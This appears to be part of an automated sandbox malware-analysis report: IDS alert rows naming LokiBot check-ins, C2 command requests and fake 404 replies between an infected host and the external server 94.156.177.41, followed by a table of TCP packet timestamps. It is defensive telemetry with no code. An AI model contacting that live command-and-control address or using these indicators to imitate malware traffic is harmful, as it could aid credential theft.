2024-12-09T08:52:58.223873+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49911	94.156.177.41	80	TCP
2024-12-09T08:52:58.343275+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49911	TCP
2024-12-09T08:52:58.611498+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:52:58.611498+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:52:58.611498+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:53:00.043307+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:53:00.043307+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:53:00.162703+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49917	TCP
2024-12-09T08:53:00.419701+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:00.419701+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:00.419701+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:01.856477+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:01.856477+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:01.975965+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49924	TCP
2024-12-09T08:53:02.244480+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:02.244480+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:02.244480+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:03.676877+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:03.676877+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:03.799477+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49929	TCP
2024-12-09T08:53:04.064839+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:04.064839+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:04.064839+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:05.342475+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:05.342475+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:05.461784+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49935	TCP
2024-12-09T08:53:05.731669+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:05.731669+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:05.731669+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:07.013704+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:07.013704+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:07.133139+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49937	TCP
2024-12-09T08:53:07.405384+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:07.405384+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:07.405384+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:08.848305+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:08.848305+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:08.967742+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49943	TCP
2024-12-09T08:53:09.232229+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:09.232229+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:09.232229+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:10.512942+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:10.512942+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:10.632378+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49949	TCP
2024-12-09T08:53:10.889178+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:10.889178+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:10.889178+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:12.323602+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:12.323602+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:12.442925+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49954	TCP
2024-12-09T08:53:12.702697+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:12.702697+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:12.702697+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:14.137920+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:14.137920+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:14.257210+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49960	TCP
2024-12-09T08:53:14.518189+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:14.518189+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:14.518189+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:15.952241+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:15.952241+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:16.072199+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49962	TCP
2024-12-09T08:53:16.345760+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:16.345760+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:16.345760+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:17.623736+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:17.623736+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:17.742970+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49968	TCP
2024-12-09T08:53:18.018612+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:18.018612+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:18.018612+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:19.453534+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:19.453534+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:19.572995+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49973	TCP
2024-12-09T08:53:19.857048+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:19.857048+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:19.857048+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:21.134282+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:21.134282+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:21.253640+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49978	TCP
2024-12-09T08:53:21.514620+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:21.514620+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:21.514620+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:23.236388+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:23.236388+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:23.356465+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49984	TCP
2024-12-09T08:53:23.627769+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:23.627769+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:23.627769+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:25.096431+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:25.096431+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:25.215864+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49990	TCP
2024-12-09T08:53:25.479289+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:25.479289+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:25.479289+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:26.917838+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:26.917838+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:27.037389+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49994	TCP
2024-12-09T08:53:27.294180+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:27.294180+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:27.294180+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:31.731754+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:31.731754+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:31.852429+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	50000	TCP
2024-12-09T08:53:32.251367+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:32.251367+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:32.251367+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:34.080464+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:34.080464+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:34.199827+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	50014	TCP
2024-12-09T08:53:34.465271+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50020	94.156.177.41	80	TCP
2024-12-09T08:53:34.465271+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50020	94.156.177.41	80	TCP
2024-12-09T08:53:34.465271+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50020	94.156.177.41	80	TCP
2024-12-09T08:53:38.905570+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50020	94.156.177.41	80	TCP
2024-12-09T08:53:38.905570+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	50020	94.156.177.41	80	TCP
2024-12-09T08:53:39.024901+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	50020	TCP
2024-12-09T08:53:39.296364+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	50032	94.156.177.41	80	TCP
2024-12-09T08:53:39.296364+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	50032	94.156.177.41	80	TCP
2024-12-09T08:53:39.296364+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	50032	94.156.177.41	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 08:51:39.322993994 CET	49707	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:39.442457914 CET	80	49707	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:39.442605972 CET	49707	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:39.446641922 CET	49707	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:39.566024065 CET	80	49707	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:39.566096067 CET	49707	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:39.685473919 CET	80	49707	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:40.997716904 CET	80	49707	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:40.997884989 CET	80	49707	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:40.997886896 CET	49707	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:40.997922897 CET	49707	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:41.117120981 CET	80	49707	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:41.147066116 CET	49708	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:41.266609907 CET	80	49708	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:41.266686916 CET	49708	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:41.268788099 CET	49708	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:41.388133049 CET	80	49708	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:41.388226032 CET	49708	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:41.507613897 CET	80	49708	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:43.111928940 CET	80	49708	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:43.111943960 CET	80	49708	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:43.112123013 CET	49708	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:43.112123013 CET	49708	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:43.231411934 CET	80	49708	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:43.252880096 CET	49710	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:43.372329950 CET	80	49710	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:43.372426987 CET	49710	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:43.374638081 CET	49710	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:43.494103909 CET	80	49710	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:43.494160891 CET	49710	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:43.613607883 CET	80	49710	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:44.928045988 CET	80	49710	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:44.928157091 CET	80	49710	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:44.928263903 CET	49710	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:44.928338051 CET	49710	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:45.047544003 CET	80	49710	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:45.073910952 CET	49712	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:45.193198919 CET	80	49712	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:45.193324089 CET	49712	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:45.197715998 CET	49712	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:45.316939116 CET	80	49712	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:45.316993952 CET	49712	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:45.436204910 CET	80	49712	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:46.616503954 CET	80	49712	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:46.616584063 CET	80	49712	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:46.616641998 CET	49712	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:46.616689920 CET	49712	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:46.735992908 CET	80	49712	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:46.756989956 CET	49713	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:46.876291037 CET	80	49713	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:46.876508951 CET	49713	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:46.878506899 CET	49713	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:46.997824907 CET	80	49713	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:46.997946024 CET	49713	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:47.117259026 CET	80	49713	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:48.439110041 CET	80	49713	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:48.439280987 CET	80	49713	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:48.439292908 CET	49713	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:48.439325094 CET	49713	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:48.558598995 CET	80	49713	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:48.584274054 CET	49715	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:48.703561068 CET	80	49715	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:48.703666925 CET	49715	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:48.705818892 CET	49715	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:48.825083017 CET	80	49715	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:48.825174093 CET	49715	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:48.944688082 CET	80	49715	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:50.109545946 CET	80	49715	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:50.109565973 CET	80	49715	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:50.109740973 CET	49715	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:50.109740973 CET	49715	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:50.229156971 CET	80	49715	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:50.257796049 CET	49721	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:50.377203941 CET	80	49721	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:50.377296925 CET	49721	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:50.380800962 CET	49721	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:50.500129938 CET	80	49721	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:50.500277996 CET	49721	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:50.619740009 CET	80	49721	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:52.321990013 CET	80	49721	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:52.322197914 CET	49721	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:52.322223902 CET	80	49721	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:52.322273016 CET	49721	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:52.441797972 CET	80	49721	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:52.468113899 CET	49726	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:52.587685108 CET	80	49726	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:52.587774992 CET	49726	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:52.590128899 CET	49726	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:52.709520102 CET	80	49726	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:52.709647894 CET	49726	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:52.829722881 CET	80	49726	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:53.985956907 CET	80	49726	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:53.986025095 CET	80	49726	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:53.986105919 CET	49726	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:53.986150980 CET	49726	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:54.105408907 CET	80	49726	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:54.130881071 CET	49732	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:54.250245094 CET	80	49732	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:54.250354052 CET	49732	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:54.252533913 CET	49732	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:54.371831894 CET	80	49732	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:54.371881008 CET	49732	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:54.491276979 CET	80	49732	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:55.804064035 CET	80	49732	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:55.804148912 CET	49732	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:55.804203033 CET	80	49732	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:55.804239988 CET	49732	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:55.923388004 CET	80	49732	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:55.946007013 CET	49736	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:56.065252066 CET	80	49736	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:56.065319061 CET	49736	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:56.067589998 CET	49736	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:56.186800003 CET	80	49736	94.156.177.41	192.168.2.6
Dec 9, 2024 08:51:56.186858892 CET	49736	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:51:56.306220055 CET	80	49736	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:00.480139971 CET	80	49736	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:00.480326891 CET	80	49736	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:00.480412006 CET	49736	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:00.484941006 CET	49736	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:00.604257107 CET	80	49736	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:00.633027077 CET	49755	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:00.752443075 CET	80	49755	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:00.752533913 CET	49755	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:00.754667044 CET	49755	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:00.873928070 CET	80	49755	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:00.874032021 CET	49755	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:00.994102001 CET	80	49755	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:02.310697079 CET	80	49755	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:02.310726881 CET	80	49755	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:02.310801983 CET	49755	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:02.310852051 CET	49755	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:02.430253029 CET	80	49755	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:02.678628922 CET	49757	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:02.798825026 CET	80	49757	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:02.798903942 CET	49757	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:02.804815054 CET	49757	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:02.924088001 CET	80	49757	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:02.924151897 CET	49757	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:03.044316053 CET	80	49757	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:07.215265989 CET	80	49757	94.156.177.41	192.168.2.6
